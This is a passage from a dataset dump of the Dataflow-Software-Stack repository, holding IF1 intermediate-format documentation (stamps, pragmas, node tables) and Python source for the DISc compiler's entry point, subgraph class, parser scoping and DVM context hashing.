types of comments exist in IF1, stamps and pragmas, stamps are comments that occupy an entire line that starts with `C$`, pragmas are comments that are added after the fields of a line.\n\n## Stamps {#Stamps}\n\nStamps are used to mark some processing that has been done to a file, a few stamp type exists. A stamp line has the following syntax: `C$ stamp_type info`.\nThe following table provides an overview of the different stamp types.\n\nCharacter | Meaning\n----------|--------\nA | Array update analysis\nC | Structure checker\nD | Order nodes using data dependencies\nE | Common subexpression information \nF | Frontend\nL | Loop invariant removal\nO | Add offsets for use by the interpreter\nP | Partitioning analysis\nS | Stream analysis\nV | Vector analysis\n\n## Pragmas {#Pragmas}\n\nPragmas are used to add additional information to an instruction. Currently, 2 types of pragmas exist, pragmas that are generated by the compiler, and pragmas that are added after analyzing. Multiple pragmas can be added after a single instruction. Pragmas are terminated by a whitespace character. \n\nPragmas have the following syntax: `%<id>=<anything>,<otheranything> %<otherid>=<anything>`\n\nThe following table provides an overview of the meaning of different pragmas. The type column indicates the type of pragma; C indicates a compiler-generated pragma, while A indicates a pragma generated by analyzing.\n\nCharacter | Type | Meaning\n----------|------|---------\nbd | C | bounds\nna | C | name\nsl | C | source line\nop | C | op number with line of source\nar | A | size of activation record needed\nlz | A | edge carries a value that must be demanded\nmk | A | mark this edge by reference (%mk=r) or by value (%mk=v)\nof | A | offset in activation record\nst | A | style of memory allocation (%st=p for pointer, %st=c for contiguous)\nxy | A | position for node in graphic output\n\n# Appendix B: Literal Definitions {#Literal_def}\n\nType | String\n-----|-------\nFunction names | \"someName\"\nBoolean values | \"T\" or \"F\"\nInteger values | \"03349\"\nCharacters | \"'\\n'\" or \"'x'\"\nNull value | nil\nSingle-precision floating point value | \"3.503\" or \"5e3\" or \".503\"\nDouble-precision floating point value | \"6.626198d-34\" \".056D24\"\n\n# Appendix C: Nodes {#Nodes}\n\n<!--\narith = integer real double\nalgeb = arith + bool\natom = algeb + char\nT = any\n-->\n\nThe next section desribes both the simple and compound nodes that IF1 predefines, a few datatype conventions should be established for this.\n\n* *arith* types correspond to any numeric type\n* *algeb* types correspond to arith types and booleans\n* *atom* types correspond to algeb types and characters\n* *T* corresponds to any type\n* `(T)+` Represents one or more occurence of T\n* `(T)*` Represents zero or more occurence of T\n* `[T]` Represents one or zero occurence of T\n* `AS(T)` Represents an array or a stream that contains type T.\n* `ASM(T)` Represents an array,stream or multiple that contains type T.\n\n\n## Simple nodes {#Nodes_Simple}\n\nLabel | Name | Input | Output | Operation\n--------|-----------------------|-------------------------------|-----------------------------------|----------\n100 | AAddH | `AS(T) x T` | `AS(T)` | Add an element to the back of the array/stream\n101 | AAddL | `AS(T) x T` | `AS(T)` | Add an element to the front of the array/stream\n102 | AAdjust | **Unknown** | **Unknown** | **Unknown**\n103 | ABuild | `Int x (T)*` | `AS(T)` | Create an array/stream with a lower bound, following arguments are elements of the array\n104 | ACatenate | `AS(T) x (AS(T))+` | `Array(T)` | Catenate arrays/streams.\n105 | AElement | `AS(T) x Int` | `T` | Returns element at a given index. \n106 | AFill | `Int x Int x T` | `AS(T)` | Create an array/stream with a lower and upper bound and fill it with the last argument.<br/> An empty array/stream is created if the lower bound > upper bound\n107 | AGather | `Int x Mult(T) x [Mult(T)]` | `AS(T)` | **Only used in return subgraph** <br/>Creates an array or stream with the values of the 2nd argument, <br/>if the corresponding 3rd argument is true (or not given <br/>The first argument represents the lower bound of the array.\n108 | AIsEmpty | `AS(T)` | `Bool` | Returns True if the array/stream is empty\n109 | ALimH | `AS(T)` | `Int` | upper bound of array/stream\n110 | ALimL | `AS(T)` | `Int` | lower bound of array/stream (always 1 in case of a stream)\n111 | ARemH | `ASM(T)` | `ASM(T)` | Remove last element, returns error if empty\n112 | ARemL | `ASM(T)` | `ASM(T)` | Remove first element, returns error if empty\n113 | AReplace | `Array(T) x Int x (T)+` | `Array(T)` | Returns a new array with with the given value at the given idx of the old array. <br/> If multiple values are provided, they are placed consecutively\n114 | AScatter | `AS(T)` | `Multiple(T) x Multiple(Int)` | **Only appears in generator of forall nodes** <br/>Places array at port one, and the indices of this array at port 2.\n115 | ASetL | `Array(T) x Int` | `Array(T)` | Shifts the lower index of the array, all indices are shifted to reflect this\n116 | ASize | `AS(T)` | `Int` | Returns the amount of elements in the highest dimension of the stream/array\n117 | Abs | `Arith` | `Arith` | Absolute value\n118 | BindArguments | `Func x (T)*` | `Func` | Returns a new function with the given arguments bound to it.\n119 | Bool | `Int` | `Bool` | 0 => false, 1 => true, anything else => error\n120 | Call | `Func x (T)*` | `(T)+` | Call a function (function is represented as literal)\n121 | Char | `Int` | `Char` | Maps to the appropriate error value (or to an error)\n122 | Div | `Arith x Arith` | `Arith` | Division, when applied to integer, round to integer.\n123 | Double | `Real OR Int` | `Double` | Converts to double, returns an error if the value cannot be represented as a double\n124 | Equal | `Atom x Atom` | `Boolean` | `==`\n125 | Exp | `Arith x Arith` | `Arith` | `exp(x,y) = x^y` May lead to errors depending on input\n126 | FirstValue | `Mult(T) x [Mult(Bool)]` | `T` | **Only used in return subgraph** <br/>Returns the first value for which the corresponding bool is true (if present)\n127 | FinalValue | `Mult(T) x [Mult(Bool)]` | `T` | **Only used in return subgraph** <br/>Returns the last value for which the corresponding bool is true (if present)\n128 | Floor | `Real OR Double` | `Int` | Rounds down, returns error if the result is not in the integer range.\n129 | Int | `Atom` | `Int` | Real or double get rounded (floor after adding 0,5). Charachters returns the matching ASCII code. <br/>False maps to 0, True maps to 1. <br/>Returns an error if the value is out of the integer range.\n130 | IsError | `T x T` | `Boolean` | Returns true if the second error has the same value as the first (string literal). <br/>If the first value is the special *error* value, this function should match any error value.\n131 | Less | `Atom x Atom` | `Boolean` | `<` Both inputs should be of the same type\n132 | LessEqual | `Atom x Atom` | `Boolean` | `=<` Both inputs should be of the same type. Also represents boolean implication\n133 | Max | `Algeb x Algeb` | `Algeb` | Maximum when used on *arith* types, *or* when used on boolean types\n134 | Min | `Algeb x Algeb` | `Algeb` | Minimum when used on *arith* types, *and* when used on boolean types\n135 | Minus | `Arith x Arith` | `Arith` | `-`\n136 | Mod | `Arith x Arith` | `Arith` | Modulo\n137 | Neg | `Arith` | `Arith` | Negation\n138 | NoOp | `(T)+` | `(T)+` | Returns the input\n139 | Not | `Boolean` | `Boolean` | Not\n140 | NotEqual | `atom x atom` | `Boolean` | `!=` Also represents exclusive or when used on boolean types\n141 | Plus | `Algeb x Algeb` | `Algeb` | `+` when used on *arith* types, *or* when used on boolean types\n142 | RangeGenerate | `Int x Int` | `Multiple(Int)` | **Only appears in forall generator** <br/>Generates an inclusive sequence between the first and second int.\n143 | RBuild | **Unknown** | **Unknown** | **Unknown**\n144 | RElements | **Unknown** | **Unknown** | **Unknown**\n145 | RReplace | **Unknown** | **Unknown** | **Unknown** \n146 <br/>147<br/>148<br/>149| RedLeft<br/>RedRight<br/>RedTree<br/>Reduce | `func x T x Mult(T) x [Mult(Bool)]` | `T` | **Only used in return subgraph** <br/>Works like foldl, the 3rd argument determines if this element is used. <br/>The suffixes determine if the function is left, right, undetermined or pairwise associative. <br/>func is a string literal representing one of the following functions: <br/> {*sum, product,least, greatest, catenate*}\n150 | RestValues | **Unknown** | **Unknown** | **Unknown**\n151 | Single | `Double OR Int` | `Real` | Converts to real, error if it's outside the range of real numbers.\n152 | Times | `Algeb x Algeb` | `Algeb` | `*` when used on *arith* types, *and* when used on boolean types\n153 | Trunc | **Unknown** | **Unknown** | **Unknown**\n154 | PrefixSize | **Unknown** | **Unknown** | **Unknown**\n155 | Error | **Unknown** | **Unknown** | **Unknown**\n156 | ReplaceMulti | **Unknown** | **Unknown** | **Unknown**\n157 | Convert | **Unknown** | **Unknown** | **Unknown**\n158 | CallForeign | **Unknown** | **Unknown** | **Unknown**\n159 | AElementN | **Unknown** | **Unknown** | **Unknown**\n160 | AElementP | **Unknown** | **Unknown** | **Unknown**\n161 | AElementM | **Unknown** | **Unknown** | **Unknown**\n170 | AAddLAT | **Unknown** | **Unknown** | **Unknown**\n171 | AAddHAT | **Unknown** | **Unknown** | **Unknown**\n172 | ABufPartition | **Unknown** | **Unknown** | **Unknown**\n173 | ABuildAT | **Unknown** | **Unknown** | **Unknown**\n174 | ABufScatter | **Unknown** | **Unknown** | **Unknown**\n175 | ACatenateAT | **Unknown** | **Unknown** | **Unknown**\n176 | AElementAT | **Unknown** | **Unknown** | **Unknown**\n177 | AExtractAT | **Unknown** | **Unknown** | **Unknown**\n178 | AFillAT | **Unknown** | **Unknown** | **Unknown**\n179 | AGatherAT | **Unknown** | **Unknown** | **Unknown**\n180 | ARemHAT | **Unknown** | **Unknown** | **Unknown**\n181 | ARemLAT | **Unknown** | **Unknown** | **Unknown**\n182 | AReplaceAT | **Unknown** | **Unknown** | **Unknown**\n183 | ArrayToBuf | **Unknown** | **Unknown** | **Unknown**\n184 | ASetLAT | **Unknown** | **Unknown** | **Unknown**\n185 | DefArrayBuf | **Unknown** | **Unknown** | **Unknown**\n186 | DefRecordBuf | **Unknown** | **Unknown** | **Unknown**\n187 | FinalValueAT | **Unknown** | **Unknown** | **Unknown**\n188 | MemAlloc | **Unknown** | **Unknown** | **Unknown**\n189 | BufElements | **Unknown** | **Unknown** | **Unknown**\n190 | RBuildAT | **Unknown** | **Unknown** | **Unknown**\n191 | RecordToBuf | **Unknown** | **Unknown** | **Unknown**\n192 | RElementsAT | **Unknown** | **Unknown** | **Unknown**\n193 | ReduceAT | **Unknown** | **Unknown** | **Unknown**\n19 | ShiftBuffer | **Unknown** | **Unknown** | **Unknown**\n195 | ScatterBufPartitions | **Unknown** | **Unknown** | **Unknown**\n196 | RedLeftAT | **Unknown** | **Unknown** | **Unknown**\n197 | RedRightAT | **Unknown** | **Unknown** | **Unknown**\n198 | RedTreeAT | **Unknown** | **Unknown** | **Unknown**\n\n\n## Compound Nodes {#Nodes_Comound}\n\nWhat follows is a table defining the different compound nodes and their labels, an explanation of every compound node follows afterwards.\n\nLabel | Name \n------|------\n0 | Forall \n1 | Select \n2 | TagCase \n3 | LoopA \n4 | LoopB \n5 | IfThenElse \n6 | Iterate \n7 | WhileLoop \n8 | RepeatLoop \n9 | SeqForall \n10 | UReduce \n\n### Select\n\n* Goal: The select node represents a multiway selection. Sisal only supports a 2 way selection, but this compound node could be used to implement different constructs such as a switch too.\n* Subnodes: \n * 1 predicate node that returns a number between 0 and n - 1, n being the amount of subnodes.\n * Every other node is a path that can be followed depending on the result of the predicate.\n* Association list:\n * At least 3 associations (predicate, iftrue and iffalse in case of if)\n * First element identifies predicate subgraph\n * Every other element identify the subgraph to use for a given predicate result.\n* Signature: `(value)+ -> (value)+`\n\n### Forall\n\n* Goal: Independent execution of multiple instances of an expression\n* Subnodes: \n * **Generator:** Produce values for every instance of the body\n * **Body:** Expression to be evaluated\n * **Results:** Gathers the *ordered* results.\n* Association list:\n * Generator\n * Body \n * Returns\n* Signature: `(value)+ -> (value)+`\n\n### LoopA \n\n* Goal: Iterative looping construct. Stops when the *test* subgraph returns false. The test is executed after the body has executed once.\n* Subnodes: \n * Initialization\n * Test\n * Body\n * Returns\n* Association list:\n * Same order as subnodes\n* Signature: `(value)+ -> (value)+`\n\n### LoopB \n\n* Goal: Iterative looping construct. Stops when the *test* subgraph returns false. The test is executed before the body is executed for the first time.\n* Subnodes: \n * Initialization\n * Test\n * Body\n * Returns\n* Association list:\n * Same order as subnodes\n* Signature: `(value)+ -> (value)+`\n \n\n### TagCase\n\n**Unknown**\n\n### IfThenEl\n\n**Unknown**\n\n### Iterate \n\n**Unknown**\n\n### WhileLoo\n\n**Unknown**\n\n### RepeatLo\n\n**Unknown**\n\n### SeqForal\n\n**Unknown**\n\n### UReduce \n\n**Unknown**\n\n\\page Simple Simple piece of Sisal/IF1 code\n\\include simple.sis\n\\include simple.if1\n![Simple](../examples/simple.dot.png)\n\n\\page Call Simple call in Sisal/IF1\n\\include call.sis\n\\include call.if1\n![Call](../examples/call.dot.png)\n\n\\page Select Select compound node in Sisal/IF1\n\\include select.sis\n\\include select.if1\n![Select](../examples/select.dot.png)\n\n\\page Sort Sorting algorithm in Sisal/IF1\n\\include sort.sis\n\\include sort.if1\n![Sort](../examples/sort.dot.png)\n\n" }, { "alpha_fraction": 0.7121265530586243, "alphanum_fraction": 0.7159929871559143, "avg_line_length": 32.85714340209961, "blob_id": "5cada8865bace452fbac9a11495c0093081a0ae8", "content_id": "63220f541a99a8b5cacbaf2e49a2a507a4b6f5f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2845, "license_type": "no_license", "max_line_length": 134, "num_lines": 84, "path": "/DISc/disc.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# disc.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentat ion files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package disc\n# \\brief DISc Main file\n#\n# This module contains the entry point for DISc. It contains the\n# UI code, as well as the command line parser and exit handling.\n#\n# In short it bundles all the components of DVM together and it \n# allows the user to interact with these components.\n##\n\nimport argparse\nimport frontEnd\nimport backEnd\nimport IGR\nimport log\nimport sys\nimport os\n\n# ---------------------- #\n# Command line arguments #\n# ---------------------- #\n\nargParser = argparse.ArgumentParser(description = \"The DIS Compiler\")\n\nargParser.add_argument(\"path\", help = \"The path to the file you want to compile.\")\nargParser.add_argument(\"-d\", \"--dvm\", help = \"The path to DVM.\")\nargParser.add_argument(\"-o\", \"--output\", help = \"The location of the output file\")\nargParser.add_argument(\"-b\", \"--backEnd\", default = 'DVM', help = \"The backEnd to use.\")\nargParser.add_argument(\"-f\", \"--frontEnd\", type = str, help = \"The frontEnd to use.\")\nargParser.add_argument(\"-ll\", \"--logLevel\", type = int, default = 30, help = \"Specify the log level\")\n\nargParser.add_argument(\"--dot\", action = \"store_true\", help = \"Generate a dot graph of the program\")\nargParser.add_argument(\"--dry_run\", action = \"store_true\", help = \"Don't compile the program but abort after parsing the input file.\")\n\nargs = argParser.parse_args()\n\n# ------------- #\n# Program Setup #\n# ------------- #\n\nlog.setup(args.logLevel)\n\nfileName, fileExtension = os.path.splitext(args.path)\n\nfrontEnd.setUp(fileExtension, args.frontEnd)\nfrontEnd.fromFile(args.path)\n\nif args.dot:\n\tIGR.dot(skipCompound = False)\n\nif args.dry_run:\n\tsys.exit(0)\n\nbackEnd.setUp(fileName, args.backEnd, args.output)\nbackEnd.toFile()\n\n" }, { "alpha_fraction": 0.6938257813453674, "alphanum_fraction": 0.6960812211036682, "avg_line_length": 25.08823585510254, "blob_id": "8a4bf40d6233d5bd0f102281d64acac0082e417f", "content_id": "6e67c8409e1bb2203c5842caa47127b589bab873", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3547, "license_type": "no_license", "max_line_length": 79, "num_lines": 136, "path": "/DISc/IGR/subgraph.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# subgraphs.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.subgraph\n# \\brief SubGraph definitions\n# \n# IGR subgraphs. \n##\n\n##\n# SubGraph\n# \n# An IGR subgraph is either a function body,\n# or a part of the compound node. \n#\n##\nclass SubGraph(object):\n\n\tdef __init__(self, entry, exit, name, isFunc):\n\t\tsuper(SubGraph, self).__init__()\n\t\tself.name = name\n\t\tself.entry = entry\n\t\tself.exit = exit\n\t\tself.nodes = []\n\t\tself.value = None\n\t\tself.isFunc = isFunc\n\n\t##\n\t# Printable subgraph\n\t##\n\tdef __str__(self):\n\t\tpair = \"(\" + str(self.entry) + \" | \" + str(self.exit) + \")\"\n\t\treturn \"'\" + self.name + \"' \" + \"subgraph \" + pair\n\n\t##\n\t# Get an output port of the subgraph. \n\t# This maps to the ports of the entry node.\n\t#\n \t# This may seem counterintuitive, but this is seen\n\t# from the perspective of the inside of the subgraph.\n\t# In which case the output port is used to retrieve data\n\t# from the subgraph.\n\t##\n\tdef getOutputPort(self, idx):\n\t\treturn self.entry.getOutputPort(idx)\n\n\t##\n\t# Gets an input port of the subgraph.\n\t# This maps to the input of the return (exit) node.\n\t#\n\t# Once again this is seen from the inside of the subgraph.\n\t# If we want to add data to the subgraph, we try to return it\n\t# to the outside world, which is done through the exit node.\n\t##\n\tdef getInputPort(self, idx):\n\t\treturn self.exit.getInputPort(idx)\n\n\t##\n\t# Add a node to the node list of the\n\t# subgraph.\n\t##\n\tdef addNode(self, node):\n\t\tself.nodes.append(node)\n\n\t##\n\t# See if a graph can be reduced to a \n\t# constant value.\n\t##\n\tdef isTrivial(self):\n\t\treturn self.value is not None\n\n\t##\n\t# Attach a constant to a subgraph.\n\t##\n\tdef reduce(self, value):\n\t\tself.value = value\n\n\t##\n\t# Remove a node.\n\t#\n\t# This only removes the node from the\n\t# node list. It does not clean up any \n\t# edges possibly leading to the node.\n\t#\n\t# It silently fails if the node does not \n\t# exist.\n\t##\n\tdef removeNode(self, node):\n\t\ttry:\n\t\t\tself.nodes.remove(node)\t\n\t\texcept ValueError: pass\n\n\t##\n\t# Replace a node.\n\t#\n\t# This replaces a node in the node list\n\t# of the subgraph by new. All of the in and\n\t# output ports of the node are added to new.\n\t##\n\tdef replaceNode(self, node, new):\n\t\tidx = self.nodes.index(node)\n\t\tself.nodes[idx] = new\n\n\t\tnew.inputs = node.inputs\n\t\tnew.outputs = node.outputs\n\t\tnew.inputPorts = node.inputPorts\n\t\tnew.outputPorts = node.outputPorts\n\n\t\tfor port in new.inputPorts:\n\t\t\tport.node = new\n\t\tfor port in new.outputPorts:\n\t\t\tport.node = new" }, { "alpha_fraction": 0.6707826852798462, "alphanum_fraction": 0.6761601567268372, "avg_line_length": 21.827272415161133, "blob_id": "ecf56d4003715eef6120ccf307f0dc8b691b484d", "content_id": "1413e2869e957512f0b956c03b3050e1634d75b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5021, "license_type": "no_license", "max_line_length": 79, "num_lines": 220, "path": "/DISc/frontEnd/IF1/environment.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# environment.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.environment\n# \\brief Node lookup and scoping rules.\n# \n# This module contains the \"state\" of the parser.\n# It keeps track of the discovered nodes and graphs\n# and the scopes they are in. \n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# ----- #\n# Frame #\n# ----- #\n\n##\n# Single part of the scope stack.\n# \n# A scope contains all of the definitions\n# of the current scope.\n#\n##\nclass Scope(object):\n\n\t##\n\t# Create a scope belonging to a subgraph.s\n\t# By convention, the subgraph can always be \n\t# found at label 0.\n\t##\n\tdef __init__(self, subGraph = None):\n\t\tsuper(Scope, self).__init__()\n\t\tself.nodes = [subGraph]\n\n\t##\n\t# Add a node to the scope.\n\t#\n\t# The label of the node should match\n\t# the current length of the node list of this object.\n\t# This is the case since IF1 nodes start are sequentially\n\t# numbered starting from one.\n\t#\n\t# \\param label\n\t# \t\tThe IF1 label of the node.\n\t# \\param node\n\t#\t\tThe IGR node to assign to the label\n\t##\n\tdef addNode(self, label, node):\n\t\tif len(self.nodes) is label:\n\t\t\tself.nodes += [node]\n\t\telse:\n\t\t\t# This situation can occur in IF1 (might be a bug)\n\t\t\t# so fill the list with none until the length is ok.\n\t\t\tlog.warning(\"Non-sequential node label added!\")\n\t\t\tpadding = [None for i in xrange(0, label - len(self.nodes))]\n\t\t\tself.nodes += padding\n\t\t\tself.addNode(label, node)\n\n\t##\n\t# Get a node from the scope.\n\t#\n\t# \\param label\n\t#\t\tThe label of the node to get\n\t##\n\tdef getNode(self, label):\n\t\treturn self.nodes[label]\n\n\t##\n\t# Get the subgraph of the scope.\n\t##\n\tdef getSubGraph(self):\n\t\treturn self.nodes[0]\n\n##\n# Single part of the scope stack.\n#\n# This scope is only to be used inside the global\n# environment of a compound node. It is meant to store\n# the various subgraphs of a compound node.\n##\nclass CompoundScope(object):\n\tdef __init__(self):\n\t\tsuper(CompoundScope, self).__init__()\n\t\tself.graphs = []\n\n\t##\n\t# Add a graph to the list of subgraphs\n\t##\n\tdef addSubGraph(self, graph):\n\t\tself.graphs.append(graph)\n\n# ------- #\n# Scoping #\n# ------- #\n\n##\n# A stack with the global scope at the bottom,\n# and the current scope at the top.\n##\n__STACK__ = [Scope()]\n\n##\n# Create a new scope and push\n# it on top of the stack.\n##\ndef scope(subGraph):\n\tglobal __STACK__\n\t__STACK__ = [Scope(subGraph)] + __STACK__\n\n##\n# Create a new compound scope and push it\n# on top of the stack.\n##\ndef scopeCompound():\n\tglobal __STACK__\n\t__STACK__ = [CompoundScope()] + __STACK__\n\n##\n# Remove the current scope.\n# Returns to the previous scope.\n##\ndef popScope():\n\tglobal __STACK__\n\tif len(__STACK__) > 1:\n\t\t__STACK__ = __STACK__[1:]\n\n##\n# Get the node with label in the current scope.\n#\n# \\param label\n#\t\tThe label to look for.\n##\ndef getNode(label):\n\treturn __STACK__[0].getNode(label)\n\n##\n# Add node with label to the current scope.\n#\n# \\param label\n#\t\tThe IF1 label of the node.\n# \\param node\n#\t\tThe node to add\n##\ndef addNode(label, node): \n\t__STACK__[0].addNode(label, node)\n\n##\n# Get the subgraph of the current scope.\n##\ndef getSubGraph():\n\treturn __STACK__[0].getSubGraph()\n\n##\n# Add a subgraph to the compound scope.\n# This will cause errors if the current\n# scope is not a compound scope.\n##\ndef addSubGraph(graph):\n\t__STACK__[0].addSubGraph(graph)\n\n##\n# Get the subgraphs.\n# This will cause errors if the current\n# scope is not a compound scope.\n##\ndef getSubGraphs():\n\treturn __STACK__[0].graphs\n\n# ----------------- #\n# Compound Checking #\n# ----------------- #\n\n## \n# Keeps track of the level of depth\n# w.r.t. a compound definition.\n# \n# This allows us to handle nested compound\n# nodes without issues.\n##\n__COMP_LEVEL__ = 0\n\n## Are we currently in a compound node?\ndef isCompound():\n\treturn __COMP_LEVEL__ is not 0\n\n## Enter a compound node.\ndef enterComp():\n\tglobal __COMP_LEVEL__\n\t__COMP_LEVEL__ += 1\n\n## Exit a compound node.\ndef exitComp():\n\tglobal __COMP_LEVEL__\n\t__COMP_LEVEL__ -= 1" }, { "alpha_fraction": 0.7018669843673706, "alphanum_fraction": 0.7082847356796265, "avg_line_length": 26, "blob_id": "d84b5e3749c52133bf5a7e369ec388dc9f258786", "content_id": "095e1a95a2de9eda67cade04da25415bce05c7f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "no_license", "max_line_length": 79, "num_lines": 127, "path": "/DVM/core/context.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# context.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.context\n# \\brief DVM Contexts\n# \n# This module defines contexts.\n# Contexts allow us to add extra state to the\n# runtime. They make it possible to have multiple inputs\n# to the same instruction (e.g. multiple instances of the same function).\n##\n\nfrom math import sqrt, floor\n\n##\n# DVM Context\n#\n# A context is the part of a token tag.\n# Contexts differentiate between various instances\n# of a single part of the program.\n# \n# For instance, when calling a function, DVM will create a new context\n# shared by all the arguments to this function. Upon returning, the context\n# will be used to find the destination of the function results.\n#\n# Internally, a context is a wrapper around a unique integer.\n##\nclass Context(object):\n\tdef __init__(self, core, key):\n\t\tsuper(Context,self).__init__()\n\t\tself.hash = self.hashPair(core, key)\n\t\tself.core = core\n\n\tdef __str__(self):\n\t\treturn \"{\" + str(self.hash) + \"}\"\n\n\tdef __eq__(self, other):\n\t\treturn self.hash == other.hash\n\n\tdef __hash__(self):\n\t\treturn self.hash\n\n\t## \n\t# Generate a unique, integral identifier\n\t# for a pair of non-negative integers.\n\t#\n\t# \\see http://szudzik.com/ElegantPairing.pdf\n\t# \\see http://stackoverflow.com/a/13871379\n\t##\n\tdef hashPair(self, a, b):\n\t\tif a >= b:\n\t\t\treturn a ** 2 + a + b \n\t\telse:\n\t\t\treturn b ** 2 + a\n\n\t##\n\t# Unhashes the hash.\n\t#\n\t# \\return a (prefix, key) pair\n\t# \\see slide 8 of http://szudzik.com/ElegantPairing.pdf\n\t##\n\tdef unhashPair(self):\n\t\th = self.hash\n\t\ta = None\n\t\tb = None\n\n\t\tsqrtFloor = floor(sqrt(h))\n\t\tsqrtFloorSq = sqrtFloor ** 2\n\n\t\tif (h - sqrtFloorSq) < sqrtFloor:\n\t\t\ta = h - sqrtFloorSq\n\t\t\tb = sqrtFloor\n\t\telse:\n\t\t\ta = sqrtFloor\n\t\t\tb = h - sqrtFloorSq - sqrtFloor\n\n\t\treturn (a,b)\n\n##\n# Context creator\n#\n# Allows the generation of new contexts.\n#\n# A context creater has a unique prefix.\n# Having this prefix allows us to have multiple context \n# creators that generate unique contexts without synchronizing.\n##\nclass ContextCreator(object):\n\tdef __init__(self, core):\n\t\tself.core = core.identifier\n\t\tself.current = 0\n\t\tself.available = []\n\n\tdef get(self):\n\t\t#if self.available:\n\t\t#\treturn self.available.pop()\n\t\t#else:\n\t\tres = self.current\n\t\tself.current += 1\n\t\treturn Context(self.core, res)\n\n\tdef restore(self, context):\n\t\tself.available.append(context)" }, { "alpha_fraction": 0.679592490196228, "alphanum_fraction": 0.6881366968154907, "avg_line_length": 26.423423767089844, "blob_id": 